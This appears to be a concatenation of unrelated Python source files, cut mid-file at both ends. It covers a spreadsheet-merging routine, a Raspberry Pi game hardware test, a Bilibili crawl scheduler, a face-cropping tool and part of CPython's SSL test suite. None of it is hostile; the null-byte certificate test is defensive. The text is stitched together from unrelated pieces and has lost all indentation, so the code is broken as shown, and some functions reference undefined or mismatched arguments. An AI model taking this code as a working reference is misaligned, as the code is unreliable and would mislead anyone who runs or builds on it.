# workers.append(pool.apply_async(readThread, ("Thread-" + str(i), queue, qsum, qcount,)))
workers.append(multiprocessing.Process(target=convertThread, args=("Thread-" + str(i),
queue, qDFs, qErrors)))
workers[i].start()
for i in range(numThread):
workers[i].join()
while not qDFs.empty():
dftmp, nametmp = qDFs.get()
all_dfs.append(dftmp)
all_df_names.append(nametmp)
errors = []
while not qErrors.empty():
errors.append(qErrors.get())
print(len(all_dfs))
return all_dfs, all_df_names, errors
def makeMasterTable(all_dfs, all_df_names, chunkSize):
for index, df in enumerate(all_dfs):
year, month, day = all_df_names[index].split("-")
date = JalaliDate(year, month, day).todate()
yearlist = np.full(len(df), year).tolist()
monthlist = np.full(len(df), month).tolist()
daylist = np.full(len(df), day).tolist()
datelist = np.full(len(df), date).tolist()
df["year"] = yearlist
df["month"] = monthlist
df["day"] = daylist
df["date"] = datelist
xl = pd.concat(all_dfs, keys=all_df_names, ignore_index=True)
xl.columns = HEADER_extra
xl = xl.astype({"year": int, "month": int, "day": int})
xl['date'] = pd.to_datetime(xl['date'])
print(xl.dtypes)
xl.sort_values(by=['date'], inplace=True)
xl.reset_index(drop=True, inplace=True)
i = 0
while i*chunkSize < len(xl):
if (i+1)*chunkSize < len(xl):
df_i = xl.iloc[i*chunkSize:(i+1)*chunkSize]
else:
df_i = xl.iloc[i*chunkSize:]
df_i.to_csv('{xcelLocation}master{i}.csv'.format(i=i, xcelLocation=xcelLocation),
header=HEADER_extra, encoding='utf-8', index=False)
i += 1
return xl
def write_errors(errors):
with open("errors", 'w') as error_file:
for error in errors:
error_file.write(str(error))
error_file.write("\n")
def error_cleaner():
for name in errors:
os.remove(xcelLocation + name + '.xlsx')
|
hwtest.py
|
################################################################################
#
# rpiloui - a python game engine for hasbros looping loui game controlled via a
# raspberry pi single board computer
#
# This code is released under:
#
# Copyright (c) 2020 nasrudin2468
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
################################################################################
################################################################################
# Import Libraries
import subprocess
import time
import multiprocessing as mp
################################################################################
# Constants
################################################################################
# classes / structs
################################################################################
# Import external functions
from . import motor
from . import muxio
# Prevent direct access to this file since it would be useless
if __name__ == '__main__':
exit()
################################################################################
# Functions
# function: hwtest(arrcfg)
# reads config file and saves variables into given array
# Input: name of array containing hardware configuration
# Output: -
def hwtest(objcfg):
print("hardware testmodus.")
# Initiate hardware first
motor.init(motor, objcfg)
#muxio.init(muxio, objcfg)
objmuxio = muxio.muxiodata(objcfg) # create mux data object
funcmuxio = muxio.muxiofunc(objcfg) # create mux control object
rawtx = input(" - audio test: (enter n if you want to skip this test)")
if (rawtx != "n"):
subprocess.call("aplay ./user/audiofiles/audiotest.wav", shell=True)
else:
print ("test skipped.\n")
rawtx = ""
rawtx = input(" - LED test: (enter n if you want to skip this test)")
if (rawtx != "n"):
i = 0
subprocess.call("python3 ./lib/_runcolorcycle.py", shell=True )
else:
print ("test skipped.\n")
rawtx = input(" - motor test: (enter n if you want to skip this test)")
if (rawtx != "n"):
i = 0
k = 0
# Speed motor up from 0% to 100% clockwise
while (i < 100):
print ("Motor Speed [%]: ",i)
if (i == 0):
k = 0
else:
k = (i/100)
motor._set(motor, (k))
time.sleep(0.05)
i+=1
# Decrease motor speed from +100% clockwise to -100% (counterclockwise)
while (i > -100):
print ("Motor Speed [%]: ",i)
if (i == 0):
k = 0
else:
k = (i/100)
motor._set(motor, (k))
time.sleep(0.05)
i-= 1
# Decrease motor speed from -100% (counterclockwise) to 0%
while (i < 0):
print ("Motor Speed [%]: ",i)
if (i == 0):
k = 0
else:
k = (i/100)
motor._set(motor, (k))
time.sleep(0.05)
i+= 1
motor._set(motor, (0))
print(" ...done!\n")
else:
print ("test skipped.\n")
rawtx = input(" - mux input test: (enter n if you want to skip this test)")
if (rawtx != "n"):
testtime = time.time()+30 # Run test for 30 seconds
muxio.update(objmuxio) # Update to inital state since different actors have different Idle states
while (time.time() < testtime):
muxio.poll(objmuxio, funcmuxio) # poll actual muxdata
muxio.debugreaddelta(objmuxio) # report changed values via console
muxio.update(objmuxio) # update muxdata object
else:
print ("test skipped.\n")
print("hardware test finished.")
def playdemosound():
subprocess.call("aplay ./user/audiofiles/demoaudio.wav", shell=True)
# function: demo(arrcfg)
# show of all hardware functions
# Input: name of array containing hardware configuration
# Output: -
def demo(objcfg):
# Initiate hardware first
motor.init(motor, objcfg)
#muxio.init(muxio, objcfg)
objmuxio = muxio.muxiodata(objcfg) # create mux data object
funcmuxio = muxio.muxiofunc(objcfg) # create mux control object
playdemo = mp.Process(target=playdemosound, args=())
time.sleep(2)
motor._set(motor, (0.6))
playdemo.start()
while (True):
subprocess.call("python3 ./lib/demoled.py", shell=True )
|
scheduler.py
|
import schedule
import threading
from time import sleep
import datetime
from biliob_tracer.task import ProgressTask
import requests
import redis
from lxml import etree
import json
import requests
from db import redis_connection
from db import db
import logging
from biliob_analyzer.author_rate_caculate import author_fans_rate_caculate
from biliob_analyzer.video_rank import compute_video_rank_table
from biliob_analyzer.author_rank import calculate_author_rank
from biliob_tracer.task import ExistsTask
from biliob_analyzer.video_rank import calculate_video_rank
from biliob_analyzer.author_fans_watcher import FansWatcher
logging.basicConfig(level=logging.INFO,
format='[%(asctime)s] %(levelname)s @ %(name)s: %(message)s')
logger = logging.getLogger(__name__)
VIDEO_URL = "https://api.bilibili.com/x/article/archives?ids={aid}"
VIDEO_KEY = "videoRedis:start_urls"
AUTHOR_URL = "https://api.bilibili.com/x/web-interface/card?mid={mid}"
AUTHOR_KEY = "authorRedis:start_urls"
DANMAKU_FROM_AID_URL = "https://api.bilibili.com/x/web-interface/view?aid={aid}"
DANMAKU_KEY = "DanmakuAggregate:start_urls"
SITEINFO_URL = 'https://api.bilibili.com/x/web-interface/online'
SITEINFO_KEY = "site:start_urls"
def auto_crawl_bangumi():
task_name = "生成番剧国创待爬链接"
logger.info(task_name)
redis_connection.rpush("bangumiAndDonghua:start_urls",
"https://www.bilibili.com/ranking/bangumi/167/0/7")
redis_connection.rpush("bangumiAndDonghua:start_urls",
"https://www.bilibili.com/ranking/bangumi/13/0/7")
def auto_add_video():
task_name = "生成作者最新发布的视频的待爬链接"
logger.info(task_name)
coll = db['author']
doc_filter = {'$or': [{'focus': True}, {'forceFocus': True}]}
total = coll.count_documents(doc_filter)
c = coll.find(doc_filter, {'mid': 1})
if total != 0:
for each_doc in c:
URL = 'https://space.bilibili.com/ajax/member/getSubmitVideos?mid={}&pagesize=10&page=1&order=pubdate'.format(
each_doc['mid'])
redis_connection.rpush("videoAutoAdd:start_urls", URL)
def auto_add_author():
task_name = "生成排行榜待爬链接"
logger.info(task_name)
start_urls = [
'https://www.bilibili.com/ranking',
'https://www.bilibili.com/ranking/all/1/0/3',
'https://www.bilibili.com/ranking/all/168/0/3',
'https://www.bilibili.com/ranking/all/3/0/3',
'https://www.bilibili.com/ranking/all/129/0/3',
'https://www.bilibili.com/ranking/all/188/0/3',
'https://www.bilibili.com/ranking/all/4/0/3',
'https://www.bilibili.com/ranking/all/36/0/3',
'https://www.bilibili.com/ranking/all/160/0/3',
'https://www.bilibili.com/ranking/all/119/0/3',
'https://www.bilibili.com/ranking/all/155/0/3',
'https://www.bilibili.com/ranking/all/5/0/3',
'https://www.bilibili.com/ranking/all/181/0/3'
]
for each in start_urls:
redis_connection.rpush('authorAutoAdd:start_urls', each)
def crawlOnlineTopListData():
task_name = "生成强力追踪待爬链接"
logger.info(task_name)
ONLINE_URL = 'https://www.bilibili.com/video/online.html'
response = requests.get(ONLINE_URL)
data_text = etree.HTML(response.content.decode(
'utf8')).xpath('//script/text()')[-2]
j = json.loads(data_text.lstrip('window.__INITIAL_STATE__=')[:-122])
total = len(j['onlineList'])
for each_video in j['onlineList']:
aid = each_video['aid']
mid = each_video['owner']['mid']
if mid not in [7584632, 928123]:
priorityAuthorCrawlRequest(mid)
priorityVideoCrawlRequest(aid)
def set_minute_level_author(mid: int):
db['minute_level_author'].update(
{'mid': mid}, {'mid': mid, 'date': datetime.datetime.now(tz="CN")})
pass
def update_author():
task_name = "生成每日作者待爬链接"
logger.info(task_name)
coll = db['author']
filter_dict = {
'$or': [{
'focus': True
}, {
'forceFocus': True
}]
}
cursor = coll.find(filter_dict, {"mid": 1}).batch_size(200)
total = coll.count_documents(filter_dict)
if total != 0:
for each_doc in cursor:
redis_connection.rpush(
AUTHOR_KEY, AUTHOR_URL.format(mid=each_doc['mid']))
def update_unfocus_video():
task_name = "生成保守观测视频待爬链接"
logger.info(task_name)
doc_filter = {}
gen_video_link_by_filter(task_name, doc_filter)
def update_video():
task_name = "生成每日视频待爬链接"
logger.info(task_name)
doc_filter = {'focus': True}
gen_video_link_by_filter(task_name, doc_filter)
def gen_video_link_by_filter(task_name, doc_filter):
coll = db['video']
cursor = coll.find(doc_filter, {"aid": 1}).batch_size(200)
send_aids(task_name, 1, cursor)
def send_aids(task_name, total, cursor):
if total == 0:
return
aid_list = ''
i = 0
c = 0
for each_doc in cursor:
c += 1
aid_list += str(each_doc['aid']) + ','
i += 1
logger.info(each_doc['aid'])
if i == 50:
logger.info('传送第{}个'.format(c))
redis_connection.rpush(
VIDEO_KEY, VIDEO_URL.format(aid=aid_list[:-1]))
aid_list = ''
i = 0
redis_connection.rpush(
VIDEO_KEY, VIDEO_URL.format(aid=aid_list[:-1]))
def sendAuthorCrawlRequest(mid):
redis_connection.rpush(AUTHOR_KEY, AUTHOR_URL.format(mid=mid))
def sendVideoCrawlRequest(aid):
redis_connection.rpush(VIDEO_KEY, VIDEO_URL.format(aid=aid))
def priorityAuthorCrawlRequest(mid):
redis_connection.lpush(AUTHOR_KEY, AUTHOR_URL.format(mid=mid))
def priorityVideoCrawlRequest(aid):
redis_connection.lpush(VIDEO_KEY, VIDEO_URL.format(aid=aid))
def sendSiteInfoCrawlRequest():
redis_connection.rpush(SITEINFO_KEY, SITEINFO_URL)
def add_tag_task():
task_name = "生成待爬标签视频链接"
coll = db['video']
doc_filter = {'tag': {'$exists': False}}
total = coll.find(doc_filter, {"aid": 1}).count()
cursor = coll.find(doc_filter, {"aid": 1}).batch_size(100)
url = 'https://www.bilibili.com/video/av{}'
for each_video in cursor:
aid = each_video['aid']
logger.info("待爬AV号{}".format(aid))
redis_connection.rpush("tagAdder:start_urls", url.format(aid))
def auto_crawl_task():
task_name = "自动爬虫计划调度服务"
logger.info(task_name)
ExistsTask(task_name, update_frequency=60, collection=db['tracer'])
while True:
schedule.run_pending()
sleep(60)
def gen_online():
task_name = "生成在线人数爬取链接"
ONLINE_URL = 'https://www.bilibili.com/video/online.html'
redis_connection.rpush("online:start_urls", ONLINE_URL)
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
def set_schedule():
# schedule.every().day.at('01:00').do(run_threaded, update_author)
schedule.every().day.at('07:00').do(run_threaded, update_video)
schedule.every().day.at('12:00').do(run_threaded, FansWatcher().watchBigAuthor)
# schedule.every().day.at('13:00').do(run_threaded, author_fans_rate_caculate)
schedule.every().day.at('14:00').do(run_threaded, auto_add_author)
# schedule.every().day.at('16:50').do(run_threaded, auto_crawl_bangumi)
schedule.every().day.at('22:00').do(run_threaded, auto_add_video)
# schedule.every().day.at('04:00').do(run_threaded, add_tag_task)
schedule.every().wednesday.at('03:20').do(
run_threaded, compute_video_rank_table)
schedule.every().monday.at('03:20').do(run_threaded, calculate_author_rank)
schedule.every().week.do(run_threaded, update_unfocus_video)
schedule.every().hour.do(run_threaded, sendSiteInfoCrawlRequest)
schedule.every(1).minutes.do(run_threaded, crawlOnlineTopListData)
schedule.every(15).minutes.do(run_threaded, gen_online)
if __name__ == "__main__":
set_schedule()
|
face_helper.py
|
#coding=utf-8
import face_recognition
from PIL import Image, ImageDraw
import numpy as np
import os
import argparse
import multiprocessing
import logging
SUPPORTED_IMAGE_EXT = ['.jpg', '.png']
def is_image_file(filename):
_, ext = os.path.splitext(filename)
if not ext.lower() in SUPPORTED_IMAGE_EXT:
return False
else:
return True
def find_faces(im, threshold=120):
ret_list = []
image = np.array(im.convert('RGB'))
# (top, right, bottom, left)
face_locations = face_recognition.face_locations(image)
logging.debug('face locations: {}'.format(face_locations))
for (top, right, bottom, left) in face_locations:
width = right-left
height = bottom-top
logging.debug('width: {}, height: {}'.format(width, height))
# minimum size
if width < threshold or height < threshold:
continue
ret_list.append((top, right, bottom, left))
return ret_list
def adjust_cropped_locations(width, height, locations):
cropped_locations = []
for (top, right, bottom, left) in locations:
#
face_height = bottom - top
face_width = right - left
logging.debug('face_height: {}, face_width: {}'.format(face_height, face_width))
#
new_top = top - face_height
top = new_top if new_top > 0 else 0
new_bottom = bottom + face_height
bottom = new_bottom if new_bottom < height else height
new_left = left - face_width
left = new_left if new_left > 0 else 0
new_right = right + face_width
right = new_right if new_right < width else width
#
face_height = bottom - top
face_width = right - left
logging.debug('[new] face_height: {}, face_width: {}'.format(face_height, face_width))
#
# adjust image location
if face_height > face_width:
gap = face_height - face_width
if top == 0:
bottom = bottom-gap
elif bottom == height:
top = top+gap
else:
bottom = bottom-int(gap/2)
top = top+int(gap/2)
else:
gap = face_width - face_height
if left == 0:
right = right-gap
elif right == width:
left = left+gap
else:
right = right-int(gap/2)
left = left+int(gap/2)
#
face_height = bottom - top
face_width = right - left
logging.debug('[adjusted] face_height: {}, face_width: {}'.format(face_height, face_width))
#
cropped_locations.append((top, right, bottom, left))
return cropped_locations
def draw_image_with_face_rectangle(image_path, locations):
im = Image.open(image_path)
width, height = im.size
locations = adjust_cropped_locations(width, height, locations)
draw = ImageDraw.Draw(im)
for (top, right, bottom, left) in locations:
#
draw.line((right, top, right, bottom), fill=128, width=10)
draw.line((left, top, right, top), fill=128, width=10)
draw.line((left, top, left, bottom), fill=128, width=10)
draw.line((left, bottom, right, bottom), fill=128, width=10)
im.show()
# 从图像中截取1024x1024的区域,包含人脸的图像
def crop_square_by_face(image_path, output_dir, size=1024):
#
dir_path, filename = os.path.split(image_path)
filename_wo_ext, ext = os.path.splitext(filename)
_, dir_name = os.path.split(dir_path)
output_subdir = os.path.join(output_dir, dir_name)
if not os.path.exists(output_subdir):
os.makedirs(output_subdir)
#
im = Image.open(image_path)
width, height = im.size
logging.debug('width: {}, height: {}'.format(width, height))
face_locations = find_faces(im)
if len(face_locations) > 1:
logging.info('more than 1 face locations in the image, {}'.format(image_path))
return
cropped_locations = adjust_cropped_locations(width, height, face_locations)
index = 1
for (top, right, bottom, left) in cropped_locations:
cropped_width = right-left
cropped_height = bottom-top
if cropped_width < size or cropped_height < size:
logging.info('cropped image size < {}, {}'.format(size, image_path))
continue
cropped_path = os.path.join(output_dir, dir_name, '{}_{}{}'.format(filename_wo_ext, index, ext))
im.crop((left, top, right, bottom)).resize((size,size)).save(cropped_path)
index += 1
def process_image_list(cpu_index, image_list, output_dir):
index = 0
last_image = ''
for image_path in image_list:
try:
index += 1
last_image = image_path
crop_square_by_face(image_path, output_dir)
except Exception as _:
logging.warn("exception in CPU {} when process: {}".format(cpu_index, image_path))
logging.info("process_image_list done! CPU: {}, image_list length: {}, index: {}, last_image: {}".format(cpu_index, len(image_list), index, last_image))
def batch_crop_images(image_path, output_dir):
image_path_list = []
for root, _, files in os.walk(image_path):
for name in files:
image_path_list.append(os.path.join(root, name))
process_image_list(image_path_list, output_dir)
def crop_images(image_path, output_dir):
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if os.path.isfile(image_path):
crop_square_by_face(image_path, output_dir)
elif os.path.isdir(image_path):
batch_crop_images(image_path, output_dir)
else:
pass
def start_multi_processes(image_path, list_file_path, output_dir, cpu_count):
#
if not os.path.exists(output_dir):
os.makedirs(output_dir)
#
accomplished_file_list = []
if list_file_path and os.path.exists(list_file_path) and os.path.isfile(list_file_path):
with open(list_file_path, 'r') as fh:
for line in fh.readlines():
accomplished_file_list.append(line.strip())
#
image_list_group = []
for _ in range(0, cpu_count):
image_list_group.append([])
index = 0
count_in_accomplished_list = 0
for root, _, files in os.walk(image_path):
for name in files:
if not is_image_file(name):
continue
image_file_path = os.path.join(root, name)
if image_file_path in accomplished_file_list:
logging.debug('find in accomplished_file_list, {}'.format(image_file_path))
count_in_accomplished_list += 1
continue
image_list_group[index%cpu_count].append(image_file_path)
index += 1
logging.info('find {} in accomplished file list'.format(count_in_accomplished_list))
jobs = []
for i in range(0, cpu_count):
logging.info('index: {}, length: {}'.format(i, len(image_list_group[i])))
p = multiprocessing.Process(target=process_image_list, args=(i,image_list_group[i],output_dir,))
jobs.append(p)
p.start()
for p in jobs:
p.join()
print('[MD] Completed!')
def crop_images_multi_process(image_path, output_dir):
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if os.path.isfile(image_path):
crop_square_by_face(image_path, output_dir)
elif os.path.isdir(image_path):
batch_crop_images(image_path, output_dir)
else:
pass
#
def print_multi_faces_image(image_path):
im = Image.open(image_path)
count = len(find_faces(im, 1))
if count > 1:
logging.info('more than 1 faces in {}'.format(image_path))
def check_face_count_in_image(image_dir):
for root, _, files in os.walk(image_dir):
for name in files:
if not is_image_file(name):
continue
image_path = os.path.join(root, name)
logging.debug('process {}'.format(image_path))
print_multi_faces_image(image_path)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Command Usages')
parser.add_argument("-i", "--input", type=str, help="input")
parser.add_argument("-o", "--output", type=str, default="output_dir", help="output")
parser.add_argument("-d", "--draw", action="store_true", help="draw face rectangle in image")
parser.add_argument("-c", "--crop", action="store_true", help="crop face areas")
parser.add_argument("-p", "--cpu_count", type=int, default=0, \
help="cpu count for multiprocessing, default value is 0, which means all of cpu would be used")
parser.add_argument("-m", "--multi", action="store_true", help="print multiple faces in image")
parser.add_argument("-l", "--list_file", type=str, help="list file contains accomplished files")
args = parser.parse_args()
global_cpu_count = multiprocessing.cpu_count()
logging.basicConfig(filename='face_helper.log', level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
if args.input and os.path.exists(args.input):
if args.draw:
im = Image.open(args.input)
locations = find_faces(im)
draw_image_with_face_rectangle(args.input, locations)
elif args.crop:
if args.cpu_count >= 0:
if args.cpu_count == 0:
cpu_count = global_cpu_count
elif args.cpu_count <= global_cpu_count:
cpu_count = args.cpu_count
else:
cpu_count = global_cpu_count
logging.info('start multiprocessing to crop images, process count = {}'.format(cpu_count))
start_multi_processes(args.input, args.list_file, args.output, cpu_count)
else:
logging.info('crop images in single process.')
# crop_images(args.input, args.output)
elif args.multi:
check_face_count_in_image(args.input)
else:
pass
else:
parser.print_help()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import test_support
import asyncore
import socket
import select
import time
import gc
import os
import errno
import pprint
import urllib, urlparse
import traceback
import weakref
import functools
import platform
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
ssl = test_support.import_module("ssl")
HOST = test_support.HOST
CERTFILE = None
SVN_PYTHON_ORG_ROOT_CERT = None
NULLBYTECERT = None
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if test_support.verbose:
sys.stdout.write(prefix + exc_format)
class BasicTests(unittest.TestCase):
def test_sslwrap_simple(self):
# A crude test for the legacy API
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET))
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
# We need to access the lower-level wrapper in order to create an
# implicit SSL context without trying to connect or listen.
try:
import _ssl
except ImportError:
# The returned function won't get executed, just ignore the error
pass
@functools.wraps(func)
def f(*args, **kwargs):
try:
s = socket.socket(socket.AF_INET)
_ssl.sslwrap(s._sock, 0, None, None,
ssl.CERT_NONE, ssl.PROTOCOL_SSLv2, None, None)
except ssl.SSLError as e:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')
and 'Invalid SSL protocol variant specified' in str(e)):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
#ssl.PROTOCOL_SSLv2
ssl.PROTOCOL_SSLv23
ssl.PROTOCOL_SSLv3
ssl.PROTOCOL_TLSv1
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
def test_random(self):
v = ssl.RAND_status()
if test_support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE, False)
if test_support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if test_support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if test_support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl.OPENSSL_VERSION_INFO >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, (int, long))
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 2.0
self.assertLess(n, 0x20000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 2)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 26)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by OpenSSL, the format might change
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@test_support.requires_resource('network')
def test_ciphers(self):
remote = ("svn.python.org", 443)
with test_support.transient_internet(remote[0]):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")
s.connect(remote)
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")
s.connect(remote)
# Error checking occurs when connecting, because the SSL context
# isn't created before.
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
s.connect(remote)
@test_support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# The _delegate_methods in socket.py are correctly delegated to by an
# unconnected SSLSocket, so they will raise a socket.error rather than
# something unexpected like TypeError.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with test_support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
s.connect(("svn.python.org", 443))
c = s.getpeercert()
if c:
self.fail("Peer cert %s shouldn't be here!")
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
try:
s.connect(("svn.python.org", 443))
except ssl.SSLError:
pass
finally:
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
s.connect(("svn.python.org", 443))
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with test_support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with test_support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex(('svn.python.org', 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLError as err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
select.select([s], [], [], 5.0)
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
select.select([], [s], [], 5.0)
else:
raise
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with test_support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex(('svn.python.org', 443))
if rc == 0:
